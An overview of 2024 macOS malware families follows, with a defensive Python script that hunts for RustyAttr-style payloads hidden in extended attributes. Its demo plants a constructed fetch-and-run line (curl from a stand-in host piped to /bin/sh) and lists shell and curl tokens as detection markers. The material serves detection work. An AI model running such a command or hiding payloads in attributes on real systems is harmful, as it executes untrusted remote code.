2024 saw a sharp rise in macOS malware campaigns targeting enterprise users, with infostealers, backdoors, and APTs being the key threats.
The Atomic Stealer (AMOS) family includes variants that phish the user's login password with a fake system password dialog; with that password in hand, the stealer can unlock the login Keychain and dump the credentials stored in it.
The Backdoor Activator trojan is delivered via cracked versions of commercial applications and installs a Python runtime to execute arbitrary commands.
The LightSpy malware is a modular surveillance tool that captures audio-visual recordings of the device, collects user history, and records keystrokes and clipboard data.
BeaverTail (attributed to North Korean state-sponsored groups) lures job seekers, harvests browser-stored crypto wallet data, and drops a second-stage payload that adds keylogging and remote-control capabilities.
ToDoSwift and Hidden Risk are two similar APT campaigns identified in 2024 that target the crypto sector.
The HZ RAT backdoor targets hosts with DingTalk and WeChat installed, harvesting user data from those apps and running shell commands received from its C2 to collect and exfiltrate data.
CloudChat is a fake chat application delivered as a disk image; once installed it exfiltrates data and monitors the clipboard.
NotLockBit ransomware exfiltrates data and then encrypts files, although the samples discovered so far have not been tied to a distinct delivery method and have no known victims.
RustyAttr is macOS malware built with the Tauri development framework that hides a malicious shell script in a file's extended attributes rather than in the bundle's visible code; the app reads the attribute at runtime and executes its contents.
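Because the RustyAttr payload lives in an extended attribute and not in any file body, a file-content scan of the bundle finds nothing. The script below is an added hunting example, not code from the original page or from any vendor report: it walks a bundle, lists every extended attribute, and flags attributes that Apple itself does not write and whose bodies look like scripts. The attribute name `test`, the fake bundle layout, and the payload string are constructed for the demo; the script-marker list is a heuristic, and the macOS fallback shells out to the system `xattr` tool because CPython only exposes `os.listxattr` on Linux.

```python
import os
import subprocess
import tempfile
from pathlib import Path

# Attribute names macOS itself writes on files and bundles; anything else deserves a look.
BENIGN_PREFIXES = ("com.apple.",)
# Heuristic tokens (constructed here) that suggest an attribute body is a script, not metadata.
SCRIPT_MARKERS = (b"#!/", b"osascript", b"curl ", b"/bin/sh", b"/bin/zsh", b"/bin/bash", b"base64")


def list_xattrs(path):
    """Return {name: value_bytes} for every extended attribute on `path`.

    os.listxattr/os.getxattr exist on Linux; on macOS CPython lacks them, so the
    fallback calls the system `xattr` tool (`xattr FILE` lists names, `xattr -p NAME FILE`
    prints one value)."""
    path = str(path)
    if hasattr(os, "listxattr"):
        names = os.listxattr(path, follow_symlinks=False)
        return {n: os.getxattr(path, n, follow_symlinks=False) for n in names}
    names = subprocess.run(["xattr", path], capture_output=True, text=True, check=True).stdout.split()
    return {
        n: subprocess.run(["xattr", "-p", n, path], capture_output=True, check=True).stdout
        for n in names
    }


def assess(name, value):
    """Classify one attribute as 'benign' (Apple-written), 'suspicious' (non-Apple and
    script-like) or 'review' (non-Apple, no script markers)."""
    if name.startswith(BENIGN_PREFIXES):
        return "benign"
    body = value.lstrip()
    if body.startswith(b"#!") or any(marker in body for marker in SCRIPT_MARKERS):
        return "suspicious"
    return "review"


def scan(root):
    """Walk `root` (an .app bundle or any tree) and return [(path, attr_name, verdict)]
    for every attribute that is not benign."""
    root = str(root)
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        paths = [os.path.join(dirpath, n) for n in dirnames + filenames]
        if dirpath == root:
            paths.insert(0, root)  # the bundle directory itself can carry attributes too
        for p in paths:
            try:
                attrs = list_xattrs(p)
            except (OSError, subprocess.CalledProcessError):
                continue
            for name, value in attrs.items():
                verdict = assess(name, value)
                if verdict != "benign":
                    findings.append((p, name, verdict))
    return findings


def demo():
    """Build a constructed lookalike in a temp dir: a harmless-looking script whose real
    payload lives only in an extended attribute, then scan it. Returns the findings, or
    None when the filesystem refuses user extended attributes (some containers do)."""
    with tempfile.TemporaryDirectory() as tmp:
        macos_dir = Path(tmp) / "Fake.app" / "Contents" / "MacOS"
        macos_dir.mkdir(parents=True)
        target = macos_dir / "Fake"
        target.write_text("#!/bin/sh\necho hello\n")  # what a reviewer sees in the file body
        # Constructed payload and hostname; the attribute name "test" is an assumption for the demo.
        payload = b"#!/bin/sh\ncurl -s http://stage2.example.invalid/p | /bin/sh\n"
        try:
            if hasattr(os, "setxattr"):
                os.setxattr(str(target), "user.test", payload)  # Linux needs the user. namespace
            else:
                subprocess.run(["xattr", "-w", "test", payload.decode(), str(target)], check=True)
        except (OSError, subprocess.CalledProcessError):
            return None
        return scan(tmp)


if __name__ == "__main__":
    for path, name, verdict in demo() or []:
        print(f"{verdict:10s} {name:24s} {path}")
```

Run it against a real bundle with `scan("/Applications/Something.app")`; on macOS the equivalent manual check is `xattr -lr` over the bundle, but the script's point is the triage: Apple-namespaced attributes are expected noise, and a non-Apple attribute that starts with `#!` or mentions a shell or `curl` is the RustyAttr pattern.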